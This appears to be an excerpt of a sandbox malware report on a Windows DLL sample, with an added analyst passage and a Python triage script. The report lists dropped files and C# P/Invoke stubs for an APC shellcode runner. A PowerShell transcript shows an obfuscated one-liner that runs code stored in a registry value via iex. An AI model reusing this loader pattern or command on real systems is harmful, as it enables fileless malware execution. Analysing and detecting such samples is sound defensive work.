                        SHA-512:C5713126B0CB060EDF4501FE37A876DAFEDF064D9A9DCCD0BD435143DAB7D209EFBC112444334627FF5706386FB2149055030FCA01BA9785C33AC68E268B918D
                        Malicious:false
                        Preview:.using System;.using System.Runtime.InteropServices;..namespace W32.{. public class buvbcy. {. [DllImport("kernel32")].public static extern IntPtr GetCurrentProcess();.[DllImport("kernel32")].public static extern void SleepEx(uint jujqjjcr,uint fvu);.[DllImport("kernel32")].public static extern IntPtr VirtualAlloc(IntPtr fnpqam,uint ecktq,uint arixnpjcmw,uint mbhifa);.. }..}.
                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                        File Type:UTF-8 Unicode (with BOM) text, with very long lines, with no line terminators
                        Category:dropped
                        Size (bytes):369
                        Entropy (8bit):5.225931084277001
                        Encrypted:false
                        SSDEEP:6:pAu+H2LvkuqJDdqxLTKbDdqB/6K2wkn23fyL4qzxs7+AEszIwkn23fyL4hyAn:p37Lvkmb6KRfK0qWZEifK0hyA
                        MD5:1147F18A3762C2E65411CE6823AF9BC9
                        SHA1:6ECE2426A2EFF916432894517BB4FE044C19EB41
                        SHA-256:A0BA5C47D8E295B98D5632BE399DB0266EC788A498EE38B1F866606CF0371CFE
                        SHA-512:59AEC2E13CD44C74F199087DC9ACF1B0783AE18A1A1AA6EA2A21E21FE01C4B23856D5B13D1C6059B22647E497D525846E925B8E88DB147B109BC6D01316963F1
                        Malicious:false
                        Preview:./t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /out:"C:\Users\user\AppData\Local\Temp\0rxpcrxp\0rxpcrxp.dll" /debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\0rxpcrxp\0rxpcrxp.0.cs"
                        Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                        Category:dropped
                        Size (bytes):3584
                        Entropy (8bit):2.590914792113435
                        Encrypted:false
                        SSDEEP:24:etGSw/u2Bg85z7xlfwZD6KegdWqtkZfl7ttzWI+ycuZhNBakSvPNnq:6BYb5hFCD6KfWdJl7q1ulBa3tq
                        MD5:2456F4F945820582283911A7EFBBAB4A
                        SHA1:A4D366666624B4B4BDC85D0D43AD42D5B143EAAE
                        SHA-256:04FAD7B77D41905FAAC17B0633940B8026808CC4296EB0669106D92F76998D48
                        SHA-512:BE02502697D386EF07E704980E208710BA31838B1E7A53D96B28C73BC5819CF2A69386212774AB30CDBE2E3FA465A2A17E099F72D167DB917B0E29A0929589AD
                        Malicious:false
                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......b...........!.................#... ...@....... ....................................@..................................#..O....@.......................`....................................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................#......H.......X ..T.............................................................(....*BSJB............v4.0.30319......l...H...#~......4...#Strings............#US.........#GUID.......T...#Blob...........G.........%3............................................................2.+...................................................... 9............ K............ S.....P ......`.........f.....o.....s.....z...............`. ...`...!.`.%...`.......*.....3.+.....9.......K.......S...........
                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                        File Type:UTF-8 Unicode (with BOM) text, with very long lines, with CRLF, CR line terminators
                        Category:modified
                        Size (bytes):866
                        Entropy (8bit):5.320005711190707
                        Encrypted:false
                        SSDEEP:24:AId3ka6KRfK0LEifK0E1KaM5DqBVKVrdFAMBJTH:Akka6CK0LEuK0E1KxDcVKdBJj
                        MD5:3D782FAB19C707768E41E7C6FD17F9CE
                        SHA1:BDDE99DA59D61B59428B4AFBE9E80DBF099A337A
                        SHA-256:A7AA49D3BB4509B2E29CA40A4F7ACE22DF519B30A70E9D8559285413DF09F1E5
                        SHA-512:504959F1550C284059481377EEDCD0EBA18FCE37CB712978E9384D1265D337656206CF917B957B2F62155C04211D46B53ECCB1866035AF079EFB5D1E297D2AD1
                        Malicious:false
                        Preview:.C:\Windows\system32> "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /out:"C:\Users\user\AppData\Local\Temp\0rxpcrxp\0rxpcrxp.dll" /debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\0rxpcrxp\0rxpcrxp.0.cs"......Microsoft (R) Visual C# Compiler version 4.7.3056.0...for C# 5..Copyright (C) Microsoft Corporation. All rights reserved.......This compiler is provided as part of the Microsoft (R) .NET Framework, but only supports language versions up to C# 5, which is no longer the latest version. For compilers that support newer versions of the C# programming language, see http://go.microsoft.com/fwlink/?LinkID=533240....
                        Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                        File Type:MSVC .res
                        Category:dropped
                        Size (bytes):652
                        Entropy (8bit):3.084270469417881
                        Encrypted:false
                        SSDEEP:12:DXt4Ii3ntuAHia5YA49aUGiqMZAiN5gryDak7YnqqvPN5Dlq5J:+RI+ycuZhNBakSvPNnqX
                        MD5:CFBBE6F0EEA525E68A757A7B26894059
                        SHA1:1C7A114ED6AE3438F26D4CD42693C46C4C75B183
                        SHA-256:B9C36592225D7FEDEA84BDA23F6C6A58AA6C7C63C3F2B15A397C8E8B415A35B3
                        SHA-512:B0D4A223CD38A398F74D16393F30CD8DAF05C4F47D1DF538B373A78918D86F1F6D191BDDC325D8EE783E8741FC70305038507EA008C29396112964A22B83CE00
                        Malicious:false
                        Preview:.... ...........................L...<...............0...........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...0.r.x.p.c.r.x.p...d.l.l.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...D.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e...0.r.x.p.c.r.x.p...d.l.l.....4.....P.r.o.d.u.c.t.V.e.r.s.i.o.n...0...0...0...0...8.....A.s.s.e.m.b.l.y. .V.e.r.s.i.o.n...0...0...0...0...
                        Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                        File Type:Intel 80386 COFF object file, not stripped, 3 sections, symbol offset=0x48a, 9 symbols
                        Category:dropped
                        Size (bytes):1328
                        Entropy (8bit):3.9878869287849548
                        Encrypted:false
                        SSDEEP:24:H/e9EuZfnB08DfHYhKdNWI+ycuZhNmakSuPNnq9qd:mBBH6Kd41ulma3yq9K
                        MD5:3608CB888C2146BE6248E3EC15D708A2
                        SHA1:DF5A4DE39B0509EDC21713E7A845ABA69A174A2F
                        SHA-256:41BCA26ACE483C3A60E081F82CAA1ABBEC23FEBB13944D95879AE77B7907C67B
                        SHA-512:9947B5D2268F94CF8AF79477FB8CFEFEC12AA3DC700E04639FD75A3835FF0452A7683424F661DAAE18F4CBE0F831F1BEEA12DD9FB76A2502B7CECC63B1F98AB8
                        Malicious:false
                        Preview:L......b.............debug$S........L...................@..B.rsrc$01........X.......0...........@..@.rsrc$02........P...:...............@..@........S....c:\Users\user\AppData\Local\Temp\rn2v1u0v\CSCE8729092494447E68BAFD2B3DE7C4FE.TMP.................;..:....((...*F..........4.......C:\Users\user\AppData\Local\Temp\RESBB61.tmp.-.<...................'...Microsoft (R) CVTRES.[.=..cwd.C:\Windows\system32.exe.C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe................................................0.......................H.......L...........H.........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...r.n.2.v.1.u.0.v...d.l.l.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...D.....O.r.i.g.i.n.
                        Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                        File Type:Intel 80386 COFF object file, not stripped, 3 sections, symbol offset=0x48a, 9 symbols
                        Category:dropped
                        Size (bytes):1328
                        Entropy (8bit):3.989795686656622
                        Encrypted:false
                        SSDEEP:24:H3e9E2+fKMmwUcDfHchKdNWI+ycuZhNBakSvPNnq9qd:JKpKOKd41ulBa3tq9K
                        MD5:67B35BBF8CFA938C7974E498B4E179F3
                        SHA1:ADA46C31936B0C64A83F3B8017245EF5053C7177
                        SHA-256:C3818266B1CD84EDC45414C3BBFF11136345086CBC911B0FA8D21E8BC7A440A6
                        SHA-512:F9FD32A04842C528E2AAA9F8B47053AE800FDB9C9DEAA445F1BF9D6EBAF4A1B5FA48CC055BCADC821BB147E0F3D5AE1ED0C198A65BAA25C2199A5994D28CEBF6
                        Malicious:false
                        Preview:L......b.............debug$S........L...................@..B.rsrc$01........X.......0...........@..@.rsrc$02........P...:...............@..@........T....c:\Users\user\AppData\Local\Temp\0rxpcrxp\CSC81748258BEC6426288BE9680C960B04E.TMP...................%.uz{&.@Y..........4.......C:\Users\user\AppData\Local\Temp\RESDBAB.tmp.-.<...................'...Microsoft (R) CVTRES.[.=..cwd.C:\Windows\system32.exe.C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe................................................0.......................H.......L...........H.........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...0.r.x.p.c.r.x.p...d.l.l.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...D.....O.r.i.g.i.n.
                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                        File Type:very short file (no magic)
                        Category:dropped
                        Size (bytes):1
                        Entropy (8bit):0.0
                        Encrypted:false
                        SSDEEP:3:U:U
                        MD5:C4CA4238A0B923820DCC509A6F75849B
                        SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                        SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                        SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                        Malicious:false
                        Preview:1
                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                        File Type:very short file (no magic)
                        Category:dropped
                        Size (bytes):1
                        Entropy (8bit):0.0
                        Encrypted:false
                        SSDEEP:3:U:U
                        MD5:C4CA4238A0B923820DCC509A6F75849B
                        SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                        SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                        SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                        Malicious:false
                        Preview:1
                        Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                        File Type:MSVC .res
                        Category:dropped
                        Size (bytes):652
                        Entropy (8bit):3.1007656956481933
                        Encrypted:false
                        SSDEEP:12:DXt4Ii3ntuAHia5YA49aUGiqMZAiN5gryq5ak7YnqqHOPN5Dlq5J:+RI+ycuZhNmakSuPNnqX
                        MD5:FF3BFB8D3A0A9EA79E282805E8CE2A46
                        SHA1:A44C9C73E8FED7E57DF7D1A86D2D73FF710DC719
                        SHA-256:985C9235CD600547CD3336BB98F34F1B06DC62F755586E25329661B988A3BBF8
                        SHA-512:E4AAE728A3F27722D4D153F0567F3E4DD412847B8D44DB0294198907439ED3E17F67AC5996890ED5579B21615E11F5F0FCE38A5169B3FDE1BAC7169D79087009
                        Malicious:false
                        Preview:.... ...........................L...<...............0...........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...r.n.2.v.1.u.0.v...d.l.l.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...D.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e...r.n.2.v.1.u.0.v...d.l.l.....4.....P.r.o.d.u.c.t.V.e.r.s.i.o.n...0...0...0...0...8.....A.s.s.e.m.b.l.y. .V.e.r.s.i.o.n...0...0...0...0...
                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                        File Type:UTF-8 Unicode (with BOM) text
                        Category:dropped
                        Size (bytes):403
                        Entropy (8bit):5.058106976759534
                        Encrypted:false
                        SSDEEP:6:V/DsYLDS81zuJiWmMRSR7a1nQTsyBSRa+rVSSRnA/fpM+y:V/DTLDfuQWMBDw9rV5nA/3y
                        MD5:99BD08BC1F0AEA085539BBC7D61FA79D
                        SHA1:F2CA39B111C367D147609FCD6C811837BE2CE9F3
                        SHA-256:8DFF0B4F90286A240BECA27EDFC97DCB785B73B8762D3EAE7C540838BC23A3E9
                        SHA-512:E27A0BF1E73207800F410BA9399F1807FBA940F82260831E43C8F0A8B8BFA668616D63B53755526236433396AF4EF21E1EB0DFA9E92A0F34DB8A14C292660396
                        Malicious:false
                        Preview:.using System;.using System.Runtime.InteropServices;..namespace W32.{. public class bju. {. [DllImport("kernel32")].public static extern uint QueueUserAPC(IntPtr wqyemwbu,IntPtr vlbfvx,IntPtr hokikv);.[DllImport("kernel32")].public static extern IntPtr GetCurrentThreadId();.[DllImport("kernel32")].public static extern IntPtr OpenThread(uint uqvnjbf,uint pmyb,IntPtr rheqdsvorya);.. }..}.
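The two C# sources above (W32.buvbcy and W32.bju) are the stubs PowerShell hands to csc.exe when a script calls Add-Type with P/Invoke signatures; the compiled DLLs, the csc.exe argument files and the cvtres.exe objects listed around them are the by-products of that compilation. Read together, the declared imports are VirtualAlloc, GetCurrentThreadId, OpenThread, QueueUserAPC and SleepEx, which is the API set of a local APC shellcode runner: allocate memory, queue an APC pointing at it on the current thread, then call SleepEx with bAlertable set so the APC is delivered. The following triage helper is an added example, not part of the Joe Sandbox report or of the sample: it parses DllImport declarations, scores the combined API set against a small table of execution primitives (the table and its labels are an assumption of this example), and measures how many parameter names look machine-generated. The C# strings are copies of the two previews with the "." placeholders turned back into whitespace. The API set alone is a triage signal, not proof of execution; the PowerShell that drives these stubs is not in the previews.

```python
"""Extract DllImport declarations from PowerShell-compiled C# stubs and score
the combined Win32 API set against shellcode-execution primitives.
Added example for triage; not code from the report or the sample."""
from __future__ import annotations
import re
from dataclasses import dataclass

# Constructed copies of the two C# previews above ('.' in the report's preview
# stands for a newline or tab; identifiers and signatures are verbatim).
STUB_A = """using System;
using System.Runtime.InteropServices;
namespace W32 {
  public class buvbcy {
    [DllImport("kernel32")] public static extern IntPtr GetCurrentProcess();
    [DllImport("kernel32")] public static extern void SleepEx(uint jujqjjcr,uint fvu);
    [DllImport("kernel32")] public static extern IntPtr VirtualAlloc(IntPtr fnpqam,uint ecktq,uint arixnpjcmw,uint mbhifa);
  }
}"""
STUB_B = """using System;
using System.Runtime.InteropServices;
namespace W32 {
  public class bju {
    [DllImport("kernel32")] public static extern uint QueueUserAPC(IntPtr wqyemwbu,IntPtr vlbfvx,IntPtr hokikv);
    [DllImport("kernel32")] public static extern IntPtr GetCurrentThreadId();
    [DllImport("kernel32")] public static extern IntPtr OpenThread(uint uqvnjbf,uint pmyb,IntPtr rheqdsvorya);
  }
}"""

# [DllImport("dll", ...)] public static extern <ret> <name>(<params>)
DLLIMPORT_RE = re.compile(
    r'\[DllImport\("(?P<dll>[^"]+)"[^\]]*\]\s*public\s+static\s+extern\s+'
    r'(?P<ret>[\w.]+)\s+(?P<name>\w+)\s*\((?P<params>[^)]*)\)')

# API sets that together implement one execution primitive. Assumption of this
# example: these four cover the common PowerShell shellcode runners.
PRIMITIVES = {
    # allocate locally, queue an APC on a thread, then SleepEx(.., bAlertable) delivers it
    "local-apc-shellcode-run": {"VirtualAlloc", "OpenThread", "QueueUserAPC", "SleepEx"},
    "local-thread-shellcode-run": {"VirtualAlloc", "CreateThread"},
    "remote-thread-injection": {"OpenProcess", "VirtualAllocEx", "WriteProcessMemory", "CreateRemoteThread"},
    "remote-apc-injection": {"OpenProcess", "VirtualAllocEx", "WriteProcessMemory", "QueueUserAPC"},
}


@dataclass(frozen=True)
class PInvoke:
    dll: str
    ret: str
    name: str
    params: tuple[str, ...]


def parse_pinvokes(src: str) -> list[PInvoke]:
    """Return every DllImport declaration in a C# source, in file order."""
    out = []
    for m in DLLIMPORT_RE.finditer(src):
        params = tuple(p.strip() for p in m["params"].split(",") if p.strip())
        out.append(PInvoke(m["dll"].lower().removesuffix(".dll"), m["ret"], m["name"], params))
    return out


def score_primitives(imports: list[PInvoke]) -> dict[str, tuple[float, list[str]]]:
    """For each primitive: fraction of its APIs that were declared, and the APIs still missing."""
    seen = {p.name for p in imports}
    return {label: (len(need & seen) / len(need), sorted(need - seen))
            for label, need in PRIMITIVES.items()}


def looks_generated(identifier: str) -> bool:
    """Heuristic for the random lowercase names in these stubs: all lowercase
    letters with a run of three or more consonants (dwSize, lpAddress pass)."""
    if not identifier.isalpha() or not identifier.islower():
        return False
    runs = re.findall(r"[^aeiou]+", identifier)
    return max(map(len, runs), default=0) >= 3


def generated_name_ratio(imports: list[PInvoke]) -> float:
    """Share of parameter names that look generated; high values indicate per-build renaming."""
    names = [param.split()[-1] for p in imports for param in p.params]
    return sum(map(looks_generated, names)) / len(names) if names else 0.0


if __name__ == "__main__":
    imports = parse_pinvokes(STUB_A) + parse_pinvokes(STUB_B)
    for p in imports:
        print(f"{p.dll}!{p.name}({', '.join(p.params)}) -> {p.ret}")
    for label, (coverage, missing) in score_primitives(imports).items():
        print(f"{label}: {coverage:.0%} covered, missing {missing}")
    print(f"generated-looking parameter names: {generated_name_ratio(imports):.0%}")
```

Both stubs have to be scored together: the loader splits its imports across two Add-Type calls, so either file on its own covers only half of the primitive. Renamed class and parameter names change the hashes of the dropped .cs and .dll files per run, which is why the API names, not the file hashes, are the stable indicator here.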
                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                        File Type:UTF-8 Unicode (with BOM) text, with very long lines, with no line terminators
                        Category:dropped
                        Size (bytes):369
                        Entropy (8bit):5.269530833890747
                        Encrypted:false
                        SSDEEP:6:pAu+H2LvkuqJDdqxLTKbDdqB/6K2wkn23fA2FT10zxs7+AEszIwkn23fA2FTdx:p37Lvkmb6KRfDFTqWZEifDFTP
                        MD5:9D07155D75E02CC9B3D9B4BCA2605724
                        SHA1:F26FBE154EC5A82B3EACBDC85DBA95D2D24258C7
                        SHA-256:7AFEA3ADB85E27E452FC85ABFE5C5DA6615BA9140937642383ECD4477E9B02B0
                        SHA-512:9307FDD16B84411C020C204B393C34CCC81ABE46C6575BB4892D32349ECAF9D321CCB2EA0F5C026B1EAAE0B134799B63547B7601F999EF7E3667DEAC71ED1AB6
                        Malicious:false
                        Preview:./t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /out:"C:\Users\user\AppData\Local\Temp\rn2v1u0v\rn2v1u0v.dll" /debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\rn2v1u0v\rn2v1u0v.0.cs"
                        Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                        Category:dropped
                        Size (bytes):3584
                        Entropy (8bit):2.615083133545037
                        Encrypted:false
                        SSDEEP:24:etGSy8OmU0t3lm85xWAseO4zxQ64pfUPtkZfaFVUWI+ycuZhNmakSuPNnq:6MXQ3r5xNOKQfUuJaD31ulma3yq
                        MD5:8443C1932024BF12E88200AEEA3979A9
                        SHA1:4B27B0D2CF3FAF614B4620719CDB2B65354EA9D0
                        SHA-256:60C95F0C07FCFECF930E9A6CF6B0035506F542EF69ED81C18AABB2F8BC90CC1C
                        SHA-512:E4AF72D9E12D8620EE6A910DD0E24D3CABE7F85C6673B71150E1FB2F716E1DE0FAA45A61BEE9A4B993A00ACD27A908D00FDE959A9DCBB9648389D3C2DD18BB2D
                        Malicious:false
                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......b...........!.................$... ...@....... ....................................@..................................#..W....@.......................`....................................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................#......H.......X ..\.............................................................(....*BSJB............v4.0.30319......l...H...#~......<...#Strings............#US.........#GUID.......T...#Blob...........G.........%3............................................................/.(...................................................... 6............ C............ V.....P ......a.........g.....p.....w.....~...............a. ...a...!.a.%...a.......*.....3.0.....6.......C.......V...........
                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                        File Type:UTF-8 Unicode (with BOM) text, with very long lines, with CRLF, CR line terminators
                        Category:modified
                        Size (bytes):866
                        Entropy (8bit):5.336764594163779
                        Encrypted:false
                        SSDEEP:24:AId3ka6KRfpEifwKaM5DqBVKVrdFAMBJTH:Akka6CpEuwKxDcVKdBJj
                        MD5:18E084FB1E0641B906E1057F169FD512
                        SHA1:34E718C95372728B9E6725DA855013D621C09E1F
                        SHA-256:80B51B15FB9DEE28E44B9EC5D4FA97C740635F4C986AFBE3F462569F25ED035E
                        SHA-512:6C5C704F14497B4292EE0FBC851A34305F2600FCBEDE5BA746F764F4926518B47AEAC1EE3100A8954EBA1F5241FADDA18B4EFF8E4620135C7BEF41D7D8D29B68
                        Malicious:false
                        Preview:.C:\Windows\system32> "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /out:"C:\Users\user\AppData\Local\Temp\rn2v1u0v\rn2v1u0v.dll" /debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\rn2v1u0v\rn2v1u0v.0.cs"......Microsoft (R) Visual C# Compiler version 4.7.3056.0...for C# 5..Copyright (C) Microsoft Corporation. All rights reserved.......This compiler is provided as part of the Microsoft (R) .NET Framework, but only supports language versions up to C# 5, which is no longer the latest version. For compilers that support newer versions of the C# programming language, see http://go.microsoft.com/fwlink/?LinkID=533240....
                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                        File Type:UTF-8 Unicode (with BOM) text, with very long lines, with CRLF line terminators
                        Category:dropped
                        Size (bytes):1367
                        Entropy (8bit):5.377240760406581
                        Encrypted:false
                        SSDEEP:24:BxSA/l7vBZ0x2DOXUWc15RfLCH94qWMHjeTKKjX4CIym1ZJXHHk15RfLCH94DGnx:BZ5vj0oO815R894tMqDYB1ZBk15R894a
                        MD5:7ACB5D1BD81125AB675652E41023E0F0
                        SHA1:9FC97485AC5DAAACC281A2B8EFB5EF12596C3F64
                        SHA-256:30FE99D16BFDC9CEFF28EF81808969276F3F8651FE14126D5486D7C2B0C4B335
                        SHA-512:ACF043703C782764BB648C1985A7A6704F95C8E8A2C8082B71CB04166DC3E62F178FA4B96EF2F73AC30980D406A207E3C27CB42BE96AC69EC0A4BDAFF70072F3
                        Malicious:false
                        Preview:.**********************..Windows PowerShell transcript start..Start time: 20220525112742..Username: computer\user..RunAs User: computer\user..Configuration Name: ..Machine: 468325 (Microsoft Windows NT 10.0.17134.0)..Host Application: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe new-alias -name asytsrjo -value gp; new-alias -name famnsyvweq -value iex; famnsyvweq ([System.Text.Encoding]::ASCII.GetString((asytsrjo HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E).UrlsReturn))..Process ID: 6824..PSVersion: 5.1.17134.1..PSEdition: Desktop..PSCompatibleVersions: 1.0, 2.0, 3.0, 4.0, 5.0, 5.1.17134.1..BuildVersion: 10.0.17134.1..CLRVersion: 4.0.30319.42000..WSManStackVersion: 3.0..PSRemotingProtocolVersion: 2.3..SerializationVersion: 1.1.0.1..**********************..**********************..Command start time: 20220525112742..**********************..PS>new-alias -name asytsrjo -value gp; new-alias -name famnsyvweq -value iex; famn
                        File type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                        Entropy (8bit):7.281202320961198
                        TrID:
                        • Win32 Dynamic Link Library (generic) (1002004/3) 99.60%
                        • Generic Win/DOS Executable (2004/3) 0.20%
                        • DOS Executable Generic (2002/1) 0.20%
                        • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                        File name:zs5n5sI6N2.dll
                        File size:438272
                        MD5:9ce6868cb546819a7ba2fc27f91a3777
                        SHA1:6052120b0375f44ede4985ad98f7bd89beb70c2b
                        SHA256:fc4bee1a68545b7067fad93ba74478641acd683117f9fe478a4941d7146db959
                        SHA512:ac6ae26a27242161fe48431916c8c7bfe2dea1b8f0b8ec1e07c30e4990d6cdb0c383ee846ba319eef082a50a90a858d5cb10f7fa4b00acbf0717b866105c51f6
                        SSDEEP:6144:SpmLsr+3OV4DS3D7qBWLARf3RBsFuIiUkok9dHGYgkKeOSnKM66C+m6iMabuFGGK:FsBUSzjLIRBMkf9dHLpKepKr6CvXG
                        TLSH:9894F14897685D66D84647370CE1971EFCE7FE2EE63B7ABE20642C8FF95B0104512B0A
                        File Content Preview:MZ......................@...........................................................(.......0...w+!.W....]v...............4.....Y^........7.......x.........<.............A.............., ......,%.......{.......7.o.......O.....4.......5.......@.....Rich...
                        Icon Hash:9068eccc64f6e2ad
                        Entrypoint:0x401520
                        Entrypoint Section:.text
                        Digitally signed:false
                        Imagebase:0x400000
                        Subsystem:windows gui
                        Image File Characteristics:32BIT_MACHINE, EXECUTABLE_IMAGE, DLL
                        DLL Characteristics:TERMINAL_SERVER_AWARE
                        Time Stamp:0x3EC34607 [Thu May 15 07:47:19 2003 UTC]
                        TLS Callbacks:
                        CLR (.Net) Version:
                        OS Version Major:5
                        OS Version Minor:0
                        File Version Major:5
                        File Version Minor:0
                        Subsystem Version Major:5
                        Subsystem Version Minor:0
                        Import Hash:8000dfa78ad003480e4532227762516a
                        Instruction
                        push ebp
                        mov ebp, esp
                        inc edx
                        add ecx, FFFFFFFFh
                        call 00007FD190FDD4AAh
                        pop eax
                        pop eax
                        mov dword ptr [004136F4h], eax
                        mov edx, dword ptr [00413810h]
                        sub edx, 00005289h
                        call edx
                        mov eax, ebx
                        mov dword ptr [004136F0h], eax
                        mov eax, esi
                        mov dword ptr [004136E8h], eax
                        mov dword ptr [004136F8h], ebp
                        mov dword ptr [004136ECh], edi
                        add dword ptr [004136F8h], 00000004h
                        loop 00007FD190FDD457h
                        mov dword ptr [ebp+00h], eax
                        nop
                        nop
                        or ebx, dword ptr [ebp+449BB717h]
                        fsub st(0), st(5)
                        push edx
                        pop edx
                        jnp 00007FD190FDD4F3h
                        out dx, eax
                        push ebp
                        push ebx
                        test byte ptr [ecx+7B670685h], cl
                        inc esp
                        cmp al, BBh
                        push ebx
                        mov cl, C6h
                        das
                        mov ah, 17h
                        wait
                        cmpsb
                        jnbe 00007FD190FDD4CCh
                        cmpsb
                        fst qword ptr [edi-25h]
                        out 23h, al
                        jnbe 00007FD190FDD4B2h
                        jno 00007FD190FDD503h
                        salc
                        dec byte ptr [edx+67779444h]
                        pop eax
                        cmp al, 97h
                        outsd
                        ror byte ptr [ecx+ecx*2], FFFFFFD3h
                        inc edx
                        inc ebx
                        mov edx, 8F4D5DB0h
                        add bl, ch
                        mov ebp, 10EBFDC4h
                        jmp far fword ptr [esi]
                        push ecx
                        mov ch, ah
                        push ebx
                        inc esi
                        xchg eax, ebp
                        mov esp, 2E29FAE8h
                        cmc
                        test al, BFh
                        scasd
                        fucom st(2), st(0)
                        movsd
                        mov ebp, 3238AE00h
                        retf D184h
                        mov ebx, 568788E4h
                        insd
                        Name | Virtual Address | Virtual Size | Is in Section
                        IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
                        IMAGE_DIRECTORY_ENTRY_IMPORT | 0xd8a0 | 0x8c | .rdata
                        IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x61000 | 0x9f28 | .rsrc
                        IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
